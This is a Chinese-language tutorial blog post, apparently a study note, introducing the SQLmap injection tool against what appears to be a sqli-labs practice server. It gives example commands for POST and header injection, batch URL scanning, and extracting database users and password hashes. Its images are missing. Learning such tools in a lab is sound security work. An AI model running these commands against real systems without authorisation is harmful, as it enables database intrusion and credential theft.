首页 > 数据库技术 > 详细

DAY5:SQL注入4-SQLmap

时间:2019-10-07 13:40:49      阅读:83      评论:0      收藏:0      [点我收藏+]
一、SQLmap介绍
1. SQLmap介绍(http://sqlmap.org/)
技术分享图片

 

 

2. SQLmap工作流程:当给它一个url(例如 http://127.0.0.1/index.php?a=1&b=2&c=3)时,它进行以下操作:
技术分享图片

 

 

3. SQLmap支持6种不同的注入模式
技术分享图片

 

 

4. SQLmap支持的数据库有13
技术分享图片
加上h2数据库
 
 
二、SQLmap基本使用
1. SQLmap基本使用(尽量不要用dump
技术分享图片

 

 

2. SQLmap历史记录,如何清除历史记录
技术分享图片

 

 

 
三、SQLmap常用参数
1. SQlmap -v 参数
例如:sqlmap -u "http://172.26.26.253/Less-1/index.php?id=1" -v 3
技术分享图片

 

 

2. SQLmap --current-user参数/ --current-db参数,用于显示当前数据库和当前数据库用户
例如:sqlmap -u "http://172.26.26.253/Less-1/index.php?id=1" --current-user --current-db
 
3. SQLmap --data参数,用于POST注入,想测试哪个参数就在哪个参数后面加上 *(星号),使用--data参数发送的数据包是SQLmap的useragent,尽量使用-r参数
例如:sqlmap -u "http://172.26.26.253/Less-1/index.php" --data "uname=1&passwd=1*&submit=Submit"
技术分享图片

 

 

4. SQLmap -r参数,用于读取文件中的HTTP数据包内容来测试POST注入HTTP Header注入,利用User-Agent注入时,将User-Agent内容修改为1*:
技术分享图片

 

 

5. SQLmap -m参数,用于读取文件中的URL,进行批量检测
例如:将以下三个URL分行存在1.txt文档中
http://172.26.26.253/Less-1/index.php?id=1
http://172.26.26.253/Less-2/index.php?id=1
http://172.26.26.253/Less-3/index.php?id=1
执行:python sqlmap.py -m 1.txt
 
6. SQLmap --users参数 / --passwords参数,用于获取登录数据库的账号密码
例如:
①python sqlmap.py -u "http://172.26.26.253/Less-1/index.php?id=1" --users --passwords
②python sqlmap.py -u "http://172.26.26.253/Less-1/index.php?id=1" -U root --passwords
 
MySQL密码存储加密方式(MD5)的解密:
 
 
 
 
 
 
 

DAY5:SQL注入4-SQLmap

原文:https://www.cnblogs.com/niangaoSDS/p/11630075.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!